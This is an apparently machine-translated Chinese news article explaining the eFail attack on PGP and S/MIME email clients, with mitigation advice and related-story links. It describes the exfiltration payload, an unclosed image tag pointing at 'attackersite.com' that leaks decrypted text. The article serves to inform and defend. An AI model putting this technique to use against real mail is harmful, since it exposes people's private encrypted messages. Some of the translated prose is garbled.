MIME加密电子邮件

  • 时间:
  • 浏览:43
  • 来源:it300
以下是eFail攻击如何对付PGP和S / MIME加密电子邮件 安全研究人员心情沉重,早些时候发布了电子邮件客户端中发现的一组漏洞的详细信息,这些漏洞是针对两个广泛使用的电子邮件加密标准PGP和S / MIME之后,有人在互联网上泄露了他们的论文,实际上是明天安排的。[ [12] PGP和S / MIME是流行的端到端加密标准,用于加密电子邮件,使得任何人,甚至公司,政府或网络罪犯都无法监视您的通信。
在解释如何该漏洞有效,应该注意的是,该漏洞并不存在于电子邮件加密标准本身;相反,它会影响一些错误实施这些技术的电子邮件客户端/插件。
研究人员称之为eFail,漏洞,如我们之前所述早期预警文章可能允许潜在的攻击者以明文解密您的端到端加密电子邮件的内容,即使对于过去发送的邮件也是如此。
根据欧洲安全研究人员团队发布的文件,加密电子邮件客户端处理HTML电子邮件和外部资源的方式存在漏洞,例如从外部URL加载图像和样式。
以下是eFail攻击的工作原理:电子邮件客户端通常配置为自动解密您收到的加密电子邮件的内容,但如果您的客户端也配置为自动加载外部资源,攻击者可以通过向您发送相同加密电子邮件内容的修改版本来滥用此行为以明文窃取邮件。
攻击媒介需要inje将明文写入加密邮件,然后使用漏洞利用程序,只要收件人的邮件客户端访问(或解密)邮件,它就会泄露原始加密数据
应该注意执行eFail攻击,攻击者必须能够访问您的加密电子邮件,然后以下列方式对其进行修改并发回给您,以欺骗您的电子邮件客户端向远程攻击者泄露秘密邮件,而不会提醒您。
如证据中所述 - 在研究人员发布的概念攻击中,攻击者使用您应该接收或可能已经收到的加密消息之一,然后将其转换为多部分HTML电子邮件消息,以及伪造返回地址,因此它似乎来自原始的
在新编写的电子邮件中,攻击者在加密内容之前添加一个未封闭的图像标记,如img src =“https://attackersite.com/,并通过添加图像标记的结尾来结束它,像这样:.jpg“,如截图中清楚显示的那样。
当您的易受攻击的电子邮件客户端收到此消息时,它会解密中间给出的消息的加密部分,然后自动尝试呈现HTML内容,即,图像标记包含所有解密文本作为图像的新名称,如下所示。
由于您的电子邮件客户端将尝试从攻击者控制的服务器加载图像,攻击者可以捕获此传入请求,其中文件名包含明文中原始加密电子邮件的完整内容。
尽管PGP已经存在如果您的电子邮件的完整性受到损害,一些电子邮件客户端不会显示这些警告,允许任何潜在的攻击者成功执行电子邮件攻击。
如何防止电子邮件攻击一般情况下,它会向您显示警告说明对于甚至拦截加密电子邮件的建议很困难,但对于拼命使用电子邮件加密的人来说,总是会吸引资源充足且成熟的攻击者。
放弃使用PGP或S / MIME来防止eFail攻击将是愚蠢的建议,如可以很容易地缓解报告的问题。
用户可以切换到一个好的电子邮件客户端,当电子邮件的完整性受到损害时始终显示警告,并且默认情况下不会呈现HTML电子邮件以防止自动加载外部资源y。
研究人员还建议用户采用经过验证的加密算法进行敏感通信。
研究由一组研究人员进行,包括Damian Poddebniak,Christian Dresen,Fabian Ising和Munster University of Applied的Sebastian Schinzel科学;来自波鸿鲁尔大学的JensMüller,Juraj Somorovsky和JörgSchwenk;来自KU Leuven的Simon Friedberger。
有关攻击技术的更深入细节,您可以访问有关eFail攻击的信息页面和标题为“Efail:Breaking S / MIME and OpenPGP”的论文[PDF]使用Exfiltration Channels的电子邮件加密,“由研究人员发布。有关于这篇文章的话题吗?在下面发表评论或在Facebook,Twitter或我们的LinkedIn集团与我们分享。
monday.com:管理团队计划的新方法。组织。跟踪。免费试用这个通用的团队管理工具,提高团队的工作效率.10热门书籍学习黑客获取开始或进一步开展网络安全职业所需的技能。转向HelloSign获取电子签名通过此数字化转型计划增加收入并减少人为错误。如何破解WiFi密码查看如何破解WiFi密码或WiFi黑客软件?
通过电子邮件获取每日新闻更新
加入超过500,000名信息安全专业人员每天早上将最好的网络安全保障提供给您的收件箱。

猜你喜欢

希腊最高法院批准俄罗斯对比特币嫌疑人的请求

希腊最高法院批准俄罗斯对比特币嫌疑人的请求希腊最高法院上周五表示,一名据称使用比特币数字货币洗钱40亿美元的俄罗斯人应该被引渡到俄罗斯,一位法院消息人士说。AlexanderV

2019-02-01

塑造美国网络防御的创造性破坏和自满情绪

塑造美国网络防御的创造性破坏和自满情绪创造性的破坏,思维的范式转换取代现有的秩序,可能是一个难以捉摸的概念,但它作为人类行为驱动力的力量是不可否认的。在硅谷和其他美国的高层科技

2019-02-01

为什么我(非常)担心PRISM

为什么我(非常)担心PRISM美国国家安全局正在利用我们的数字生活,监控语音电话,电子邮件,社交媒体以及谁知道什么。美国国家安全局方面的人说,这是为了国家安全;它已经停止了恐怖

2019-02-01

先发优势:为什么新的恶意软件最初会打败反恐

先发优势:为什么新的恶意软件最初会打败反恐虽然反病毒解决方案可以有效对抗广泛使用的恶意软件,但是有一个很好的机会,新的恶意软件会躲过那些解决方案。最近有重大安全事件的报告激增,

2019-02-01

台湾银行抢劫与朝鲜黑客有关

台湾银行抢劫与朝鲜黑客有关最近针对台湾一家银行的网络抢劫事件已被安全研究人员联系到一个据信在朝鲜境外活动的臭名昭着的威胁组织。黑客利用SWIFT全球金融网络大致窃取来自台湾远东

2019-02-01